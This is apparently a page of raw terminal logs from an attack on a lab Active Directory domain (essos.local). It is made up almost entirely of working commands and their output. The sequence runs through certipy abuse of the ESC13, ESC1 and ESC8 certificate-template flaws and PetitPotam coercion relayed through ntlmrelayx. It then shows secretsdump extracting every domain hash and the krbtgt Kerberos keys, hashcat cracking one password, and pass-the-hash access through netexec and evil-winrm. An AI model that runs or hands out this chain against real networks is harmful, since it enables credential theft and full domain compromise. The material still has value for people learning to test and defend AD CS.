Tag: Certificate Authority

certipy find -u 'sql_svc@essos.local' -p 'YouWillNotKerboroast1ngMeeeeee' -dc-ip '10.3.2.12' -text -enabled
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 40 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 18 enabled certificate templates
[*] Finding issuance policies
[*] Found 27 issuance policies
[*] Found 7 OIDs linked to templates
[*] Retrieving CA configuration for 'ESSOS-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'ESSOS-CA'
[*] Checking web enrollment for CA 'ESSOS-CA' @ 'braavos.essos.local'
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Saving text output to '20251007075641_Certipy.txt'
[*] Wrote text output to '20251007075641_Certipy.txt'

Certificate Authorities
  0
    CA Name                             : ESSOS-CA
    DNS Name                            : braavos.essos.local
    Certificate Subject                 : CN=ESSOS-CA, DC=essos, DC=local
    Certificate Serial Number           : 1820E2DB695D39AA41D26F903197238F
    Certificate Validity Start          : 2025-09-11 19:35:45+00:00
    Certificate Validity End            : 2030-09-11 19:45:44+00:00
    Web Enrollment
      HTTP
        Enabled                         : True
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Enabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Disabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : ESSOS.LOCAL\Administrators
      Access Rights
        ManageCa                        : ESSOS.LOCAL\Administrators
                                          ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Enterprise Admins
        ManageCertificates              : ESSOS.LOCAL\Administrators
                                          ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Enterprise Admins
        Enroll                          : ESSOS.LOCAL\Authenticated Users
    [!] Vulnerabilities
      ESC6                              : Enrollee can specify SAN.
      ESC8                              : Web Enrollment is enabled over HTTP.
      ESC11                             : Encryption is not enforced for ICPR (RPC) requests.
    [*] Remarks
      ESC6                              : Other prerequisites may be required for this to be exploitable. See the wiki for more details.

Certificate Templates
  0
    Template Name                       : ESC13
    Display Name                        : ESC13
    Certificate Authorities             : ESSOS-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-09-11T18:50:29+00:00
    Template Last Modified              : 2025-09-12T14:45:42+00:00
    Issuance Policies                   : 1.3.6.1.4.1.311.21.8.11207162.16194168.7618993.8087878.16471814.222.81485093.84030427
                                          1.3.6.1.4.1.311.21.8.11207162.16194168.7618993.8087878.16471814.222.53016532.91256354
                                          1.3.6.1.4.1.311.21.8.11207162.16194168.7618993.8087878.16471814.222.11103715.67862760
                                          1.3.6.1.4.1.311.21.8.11207162.16194168.7618993.8087878.16471814.222.46738277.16251393
                                          1.3.6.1.4.1.311.21.8.11207162.16194168.7618993.8087878.16471814.222.59906215.20214076
                                          1.3.6.1.4.1.311.21.8.11207162.16194168.7618993.8087878.16471814.222.54309475.61286128
                                          1.3.6.1.4.1.311.21.8.11207162.16194168.7618993.8087878.16471814.222.67609022.78233752
    Linked Groups                       : CN=greatmaster,CN=Users,DC=essos,DC=local
    Permissions
      Enrollment Permissions
        Enrollment Rights               : ESSOS.LOCAL\Domain Users
      Object Control Permissions
        Owner                           : ESSOS.LOCAL\Enterprise Admins
        Full Control Principals         : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
        Write Owner Principals          : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
        Write Dacl Principals           : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
    [+] User Enrollable Principals      : ESSOS.LOCAL\Domain Users
    [!] Vulnerabilities
      ESC13                             : Template allows client authentication and issuance policy is linked to group 'CN=greatmaster,CN=Users,DC=essos,DC=local'.

$ certipy req -u sql_svc@essos.local -p YouWillNotKerboroast1ngMeeeeee -ca ESSOS-CA -target braavos.essos.local -template ESC13
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 15
[*] Successfully requested certificate
[*] Got certificate with UPN 'sql_svc@essos.local'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'sql_svc.pfx'
[*] Wrote certificate and private key to 'sql_svc.pfx'

$ certipy auth -pfx sql_svc.pfx -dc-ip 10.3.2.12                                                                               
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'sql_svc@essos.local'
[*] Using principal: 'sql_svc@essos.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'sql_svc.ccache'
File 'sql_svc.ccache' already exists. Overwrite? (y/n - saying no will save with a unique filename): y  
[*] Wrote credential cache to 'sql_svc.ccache'
[*] Trying to retrieve NT hash for 'sql_svc'
[*] Got hash for 'sql_svc@essos.local': aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804

$ impacket-secretsdump -k -no-pass meereen.essos.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x737a2a868489f8fc657ab97c16b317c6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
ESSOS\MEEREEN$:plain_password_hex:3cbe291fa44f4f677efab6f63aea18d67ed764bf6c21dd31a6a46dc2f3678e2a349171a06870f2d8f6cf6da118c3b7df70f6c98d8cfd53f6d1e0749804c7eb29e8b94ca24583c285aa6eda00b8887be30b9f1f3013239f6b2d4cdc1936fba7bdee3a783354b366022f18a3d6088695b25471c85381d848ab3eca05392cf5c6ee8fff461f03008b098f6b3784624f1cd8c5244c8dd2a4d1649ae38f5c8a3043c288ec5c2fa2c3df386010f363810cc73f9560e888667b71618d7e1bcc7cd284a54b6d74439f5562be482a9b0fc824e97a05287193363840c9498323df971f017132c4785350c4a65e2db7636364095ccf
ESSOS\MEEREEN$:aad3b435b51404eeaad3b435b51404ee:8cc3c31495780c7e2e13055cb61d890d:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x0552276b93169601952221fddd9481e810ee5d50
dpapi_userkey:0xe4ab110d019233fc243d6bdb86fd66d06350caaf
[*] NL$KM 
 0000   D3 6B D5 FF 27 14 90 56  ED 90 A6 4C D5 18 FE 84   .k..'..V...L....
 0010   EC 69 09 33 E5 BE 27 F6  6E D7 DB E8 C7 31 5A 8B   .i.3..'.n....1Z.
 0020   53 C9 D6 EF B4 0E B2 A9  BF 9E C7 E1 29 ED A8 E5   S...........)...
 0030   10 E4 7D AF BF A5 86 E3  88 E5 20 2C 5A 5E 58 41   ..}....... ,Z^XA
NL$KM:d36bd5ff27149056ed90a64cd518fe84ec690933e5be27f66ed7dbe8c7315a8b53c9d6efb40eb2a9bf9ec7e129eda8e510e47dafbfa586e388e5202c5a5e5841
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3629557c8649a89c73b9785a8191a1d4:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
daenerys.targaryen:1113:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
viserys.targaryen:1114:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
khal.drogo:1115:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
jorah.mormont:1116:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
missandei:1117:aad3b435b51404eeaad3b435b51404ee:1b4fd18edf477048c7a7c32fda251cec:::
drogon:1118:aad3b435b51404eeaad3b435b51404ee:195e021e4c0ae619f612fb16c5706bb6:::
sql_svc:1119:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:8cc3c31495780c7e2e13055cb61d890d:::
BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:ffcdc8585135b0ad6991f47eb3a69767:::
gmsaDragon$:1120:aad3b435b51404eeaad3b435b51404ee:7fc360a05308304d8a75c8dbe3a5201c:::
SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:5ed65337be5baf80e87377b374dc6913:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:284e2c4031851adcc0ca7dc0a821e0acfaa81e030e70571a38ffea50113ab8a5
krbtgt:aes128-cts-hmac-sha1-96:bdde69205c84534f0c7e9d85d512fe05
krbtgt:des-cbc-md5:0702c15d67c16445
daenerys.targaryen:aes256-cts-hmac-sha1-96:cf091fbd07f729567ac448ba96c08b12fa67c1372f439ae093f67c6e2cf82378
daenerys.targaryen:aes128-cts-hmac-sha1-96:eeb91a725e7c7d83bfc7970532f2b69c
daenerys.targaryen:des-cbc-md5:bc6ddf7ce60d29cd
viserys.targaryen:aes256-cts-hmac-sha1-96:b4124b8311d9d84ee45455bccbc48a108d366d5887b35428075b644e6724c96e
viserys.targaryen:aes128-cts-hmac-sha1-96:4b34e2537da4f1ac2d16135a5cb9bd3e
viserys.targaryen:des-cbc-md5:70528fa13bc1f2a1
khal.drogo:aes256-cts-hmac-sha1-96:2ef916a78335b11da896216ad6a4f3b1fd6276938d14070444900a75e5bf7eb4
khal.drogo:aes128-cts-hmac-sha1-96:7d76da251df8d5cec9bf3732e1f6c1ac
khal.drogo:des-cbc-md5:b5ec4c1032ef020d
jorah.mormont:aes256-cts-hmac-sha1-96:286398f9a9317f08acd3323e5cef90f9e84628c43597850e22d69c8402a26ece
jorah.mormont:aes128-cts-hmac-sha1-96:896e68f8c9ca6c608d3feb051f0de671
jorah.mormont:des-cbc-md5:b926916289464ffb
missandei:aes256-cts-hmac-sha1-96:41d08ceba69dde0e8f7de8936b3e1e48ee94f9635c855f398cd76262478ffe1c
missandei:aes128-cts-hmac-sha1-96:0a9a4343b11f3cce3b66a7f6c3d6377a
missandei:des-cbc-md5:54ec15a8c8e6f44f
drogon:aes256-cts-hmac-sha1-96:2f92317ed2d02a28a05e589095a92a8ec550b5655d45382fc877f9359e1b7fa1
drogon:aes128-cts-hmac-sha1-96:3968ac4efd4792d0acef565ac4158814
drogon:des-cbc-md5:bf1c85a7c8fdf237
sql_svc:aes256-cts-hmac-sha1-96:ca26951b04c2d410864366d048d7b9cbb252a810007368a1afcf54adaa1c0516
sql_svc:aes128-cts-hmac-sha1-96:dc0da2bdf6dc56423074a4fd8a8fa5f8
sql_svc:des-cbc-md5:91d6b0df31b52a3d
MEEREEN$:aes256-cts-hmac-sha1-96:627947a08303ffc008bb8984ac96f0c760fc3d2e5eb862b11edbd3533a10c768
MEEREEN$:aes128-cts-hmac-sha1-96:5c196a34f9258e725b2cbc62c72ff5c0
MEEREEN$:des-cbc-md5:2fe97f46b9253864
BRAAVOS$:aes256-cts-hmac-sha1-96:8d4c7ad755d68b03af90cf6a3961a6b594f8c9ea20b6d3ee0a97895d028d7f8e
BRAAVOS$:aes128-cts-hmac-sha1-96:82cbe868cf91352bd7cd6f6f50feb6f1
BRAAVOS$:des-cbc-md5:86dfd964d35e0ed9
gmsaDragon$:aes256-cts-hmac-sha1-96:ac426a3d054ae8e74d015db42a6b22cb05b1940072665f973601a38f44f11571
gmsaDragon$:aes128-cts-hmac-sha1-96:7c121eb9123f679c1904fde4a979dc8b
gmsaDragon$:des-cbc-md5:706bf845f4f2df1f
SEVENKINGDOMS$:aes256-cts-hmac-sha1-96:f9a4c9931fdcfb0562e22ea9274ba2be42a4bc311bcde8b91864cb44e7ee3fd6
SEVENKINGDOMS$:aes128-cts-hmac-sha1-96:b9a00bf0a4e7757c89878238b03a020d
SEVENKINGDOMS$:des-cbc-md5:94a4b63edfb04938
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

$ netexec smb 10.3.2.10-30 -u daenerys.targaryen -H 34534854d33b398b66684072224bb47a --shares
SMB         10.3.2.11       445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) 
SMB         10.3.2.23       445    BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True) 
SMB         10.3.2.12       445    MEEREEN          [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) 
SMB         10.3.2.11       445    WINTERFELL       [-] north.sevenkingdoms.local\daenerys.targaryen:34534854d33b398b66684072224bb47a STATUS_LOGON_FAILURE 
SMB         10.3.2.22       445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False) 
SMB         10.3.2.10       445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False) 
SMB         10.3.2.23       445    BRAAVOS          [+] essos.local\daenerys.targaryen:34534854d33b398b66684072224bb47a (Pwn3d!)
SMB         10.3.2.12       445    MEEREEN          [+] essos.local\daenerys.targaryen:34534854d33b398b66684072224bb47a (Pwn3d!)
SMB         10.3.2.22       445    CASTELBLACK      [+] north.sevenkingdoms.local\daenerys.targaryen:34534854d33b398b66684072224bb47a (Guest)
SMB         10.3.2.10       445    KINGSLANDING     [-] sevenkingdoms.local\daenerys.targaryen:34534854d33b398b66684072224bb47a STATUS_LOGON_FAILURE 
SMB         10.3.2.22       445    CASTELBLACK      [*] Enumerated shares
SMB         10.3.2.22       445    CASTELBLACK      Share           Permissions     Remark
SMB         10.3.2.22       445    CASTELBLACK      -----           -----------     ------
SMB         10.3.2.22       445    CASTELBLACK      ADMIN$                          Remote Admin
SMB         10.3.2.22       445    CASTELBLACK      all             READ,WRITE      Basic RW share for all
SMB         10.3.2.22       445    CASTELBLACK      C$                              Default share
SMB         10.3.2.22       445    CASTELBLACK      IPC$            READ            Remote IPC
SMB         10.3.2.22       445    CASTELBLACK      public                          Basic Read share for all domain users
SMB         10.3.2.23       445    BRAAVOS          [*] Enumerated shares
SMB         10.3.2.23       445    BRAAVOS          Share           Permissions     Remark
SMB         10.3.2.23       445    BRAAVOS          -----           -----------     ------
SMB         10.3.2.23       445    BRAAVOS          ADMIN$          READ,WRITE      Remote Admin
SMB         10.3.2.23       445    BRAAVOS          all             READ,WRITE      Basic RW share for all
SMB         10.3.2.23       445    BRAAVOS          C$              READ,WRITE      Default share
SMB         10.3.2.23       445    BRAAVOS          CertEnroll      READ,WRITE      Active Directory Certificate Services share
SMB         10.3.2.23       445    BRAAVOS          IPC$            READ            Remote IPC
SMB         10.3.2.23       445    BRAAVOS          public          READ,WRITE      Basic Read share for all domain users
SMB         10.3.2.12       445    MEEREEN          [*] Enumerated shares
SMB         10.3.2.12       445    MEEREEN          Share           Permissions     Remark
SMB         10.3.2.12       445    MEEREEN          -----           -----------     ------
SMB         10.3.2.12       445    MEEREEN          ADMIN$          READ,WRITE      Remote Admin
SMB         10.3.2.12       445    MEEREEN          C$              READ,WRITE      Default share
SMB         10.3.2.12       445    MEEREEN          IPC$            READ            Remote IPC
SMB         10.3.2.12       445    MEEREEN          NETLOGON        READ,WRITE      Logon server share 
SMB         10.3.2.12       445    MEEREEN          SYSVOL          READ,WRITE      Logon server share 
Running nxc against 21 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

    Template Name                       : DomainControllerAuthentication
    Display Name                        : Domain Controller Authentication
    Certificate Authorities             : ESSOS-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
                                          Smart Card Logon
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-09-11T18:49:37+00:00
    Template Last Modified              : 2025-09-11T18:49:37+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : ESSOS.LOCAL\Enterprise Read-only Domain Controllers
                                          ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Domain Controllers
                                          ESSOS.LOCAL\Enterprise Admins
                                          ESSOS.LOCAL\Enterprise Domain Controllers
      Object Control Permissions
        Owner                           : ESSOS.LOCAL\Enterprise Admins
        Full Control Principals         : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Enterprise Admins
        Write Owner Principals          : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Enterprise Admins
        Write Dacl Principals           : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Enterprise Admins
        Write Property Enroll           : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Domain Controllers
                                          ESSOS.LOCAL\Enterprise Admins
                                          ESSOS.LOCAL\Enterprise Domain Controllers
        Write Property AutoEnroll       : ESSOS.LOCAL\Domain Controllers
                                          ESSOS.LOCAL\Enterprise Domain Controllers

$ impacket-ntlmrelayx -t http://braavos.essos.local/certsrv/ -smb2support --adcs --template DomainControllerAuthentication
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections

$ python3  ~/tools/PetitPotam/PetitPotam.py -u sql_svc -p YouWillNotKerboroast1ngMeeeeee -d essos.local 10.3.2.144 10.3.2.12
                                                                                              
              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN



Trying pipe lsarpc
[-] Connecting to ncacn_np:braavos.essos.local[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.3.2.12, attacking target http://braavos.essos.local
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://braavos.essos.local as ESSOS/MEEREEN$ SUCCEED
[*] SMBD-Thread-7 (process_request_thread): Received connection from 10.3.2.12, attacking target http://braavos.essos.local
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://braavos.essos.local as ESSOS/MEEREEN$ SUCCEED
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] GOT CERTIFICATE! ID 22
[*] Writing PKCS#12 certificate to ./MEEREEN$.pfx
[*] Certificate successfully written to file

$ certipy auth -pfx MEEREEN\$.pfx -dc-ip 10.3.2.12
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN DNS Host Name: 'meereen.essos.local'
[*] Using principal: 'meereen$@essos.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'meereen.ccache'
[*] Wrote credential cache to 'meereen.ccache'
[*] Trying to retrieve NT hash for 'meereen$'
[*] Got hash for 'meereen$@essos.local': aad3b435b51404eeaad3b435b51404ee:8cc3c31495780c7e2e13055cb61d890d

$ export KRB5CCNAME=$(PWD)/meereen.ccache

$ impacket-secretsdump -k -no-pass meereen.essos.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3629557c8649a89c73b9785a8191a1d4:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
daenerys.targaryen:1113:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
viserys.targaryen:1114:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
khal.drogo:1115:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
jorah.mormont:1116:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
missandei:1117:aad3b435b51404eeaad3b435b51404ee:1b4fd18edf477048c7a7c32fda251cec:::
drogon:1118:aad3b435b51404eeaad3b435b51404ee:195e021e4c0ae619f612fb16c5706bb6:::
sql_svc:1119:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:8cc3c31495780c7e2e13055cb61d890d:::
BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:ffcdc8585135b0ad6991f47eb3a69767:::
gmsaDragon$:1120:aad3b435b51404eeaad3b435b51404ee:7fc360a05308304d8a75c8dbe3a5201c:::
SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:5ed65337be5baf80e87377b374dc6913:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:284e2c4031851adcc0ca7dc0a821e0acfaa81e030e70571a38ffea50113ab8a5
krbtgt:aes128-cts-hmac-sha1-96:bdde69205c84534f0c7e9d85d512fe05
krbtgt:des-cbc-md5:0702c15d67c16445
daenerys.targaryen:aes256-cts-hmac-sha1-96:cf091fbd07f729567ac448ba96c08b12fa67c1372f439ae093f67c6e2cf82378
daenerys.targaryen:aes128-cts-hmac-sha1-96:eeb91a725e7c7d83bfc7970532f2b69c
daenerys.targaryen:des-cbc-md5:bc6ddf7ce60d29cd
viserys.targaryen:aes256-cts-hmac-sha1-96:b4124b8311d9d84ee45455bccbc48a108d366d5887b35428075b644e6724c96e
viserys.targaryen:aes128-cts-hmac-sha1-96:4b34e2537da4f1ac2d16135a5cb9bd3e
viserys.targaryen:des-cbc-md5:70528fa13bc1f2a1
khal.drogo:aes256-cts-hmac-sha1-96:2ef916a78335b11da896216ad6a4f3b1fd6276938d14070444900a75e5bf7eb4
khal.drogo:aes128-cts-hmac-sha1-96:7d76da251df8d5cec9bf3732e1f6c1ac
khal.drogo:des-cbc-md5:b5ec4c1032ef020d
jorah.mormont:aes256-cts-hmac-sha1-96:286398f9a9317f08acd3323e5cef90f9e84628c43597850e22d69c8402a26ece
jorah.mormont:aes128-cts-hmac-sha1-96:896e68f8c9ca6c608d3feb051f0de671
jorah.mormont:des-cbc-md5:b926916289464ffb
missandei:aes256-cts-hmac-sha1-96:41d08ceba69dde0e8f7de8936b3e1e48ee94f9635c855f398cd76262478ffe1c
missandei:aes128-cts-hmac-sha1-96:0a9a4343b11f3cce3b66a7f6c3d6377a
missandei:des-cbc-md5:54ec15a8c8e6f44f
drogon:aes256-cts-hmac-sha1-96:2f92317ed2d02a28a05e589095a92a8ec550b5655d45382fc877f9359e1b7fa1
drogon:aes128-cts-hmac-sha1-96:3968ac4efd4792d0acef565ac4158814
drogon:des-cbc-md5:bf1c85a7c8fdf237
sql_svc:aes256-cts-hmac-sha1-96:ca26951b04c2d410864366d048d7b9cbb252a810007368a1afcf54adaa1c0516
sql_svc:aes128-cts-hmac-sha1-96:dc0da2bdf6dc56423074a4fd8a8fa5f8
sql_svc:des-cbc-md5:91d6b0df31b52a3d
MEEREEN$:aes256-cts-hmac-sha1-96:627947a08303ffc008bb8984ac96f0c760fc3d2e5eb862b11edbd3533a10c768
MEEREEN$:aes128-cts-hmac-sha1-96:5c196a34f9258e725b2cbc62c72ff5c0
MEEREEN$:des-cbc-md5:2fe97f46b9253864
BRAAVOS$:aes256-cts-hmac-sha1-96:8d4c7ad755d68b03af90cf6a3961a6b594f8c9ea20b6d3ee0a97895d028d7f8e
BRAAVOS$:aes128-cts-hmac-sha1-96:82cbe868cf91352bd7cd6f6f50feb6f1
BRAAVOS$:des-cbc-md5:86dfd964d35e0ed9
gmsaDragon$:aes256-cts-hmac-sha1-96:ac426a3d054ae8e74d015db42a6b22cb05b1940072665f973601a38f44f11571
gmsaDragon$:aes128-cts-hmac-sha1-96:7c121eb9123f679c1904fde4a979dc8b
gmsaDragon$:des-cbc-md5:706bf845f4f2df1f
SEVENKINGDOMS$:aes256-cts-hmac-sha1-96:f9a4c9931fdcfb0562e22ea9274ba2be42a4bc311bcde8b91864cb44e7ee3fd6
SEVENKINGDOMS$:aes128-cts-hmac-sha1-96:b9a00bf0a4e7757c89878238b03a020d
SEVENKINGDOMS$:des-cbc-md5:94a4b63edfb04938
[*] Cleaning up...

hashcat -m 1000 creds/essos.dump.ntlm  /usr/share/wordlists/rockyou.txt --show
739120ebc4dd940310bc4bb5c9d37021:horse

$ cat creds/essos.dump.ntlm| grep 739                    
khal.drogo:1115:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::

$ certipy req -u khal.drogo  -p horse -ca ESSOS-CA -target braavos.essos.local -template ESC1 -upn daenerys.targaryen@essos.local
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 23
[*] Successfully requested certificate
[*] Got certificate with UPN 'daenerys.targaryen@essos.local'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'daenerys.targaryen.pfx'
[*] Wrote certificate and private key to 'daenerys.targaryen.pfx'

$ certipy auth -pfx daenerys.targaryen.pfx -dc-ip 10.3.2.12
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'daenerys.targaryen@essos.local'
[*] Using principal: 'daenerys.targaryen@essos.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'daenerys.targaryen.ccache'
[*] Wrote credential cache to 'daenerys.targaryen.ccache'
[*] Trying to retrieve NT hash for 'daenerys.targaryen'
[*] Got hash for 'daenerys.targaryen@essos.local': aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a

$ evil-winrm -r essos.local -i meereen.essos.local
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\daenerys.targaryen\Documents> whoami
essos\daenerys.targaryen
*Evil-WinRM* PS C:\Users\daenerys.targaryen\Documents> hostname
meereen
*Evil-WinRM* PS C:\Users\daenerys.targaryen\Documents>

$ evil-winrm -i meereen.essos.local -u daenerys.targaryen -H 34534854d33b398b66684072224bb47a
                                        
Evil-WinRM shell v3.7
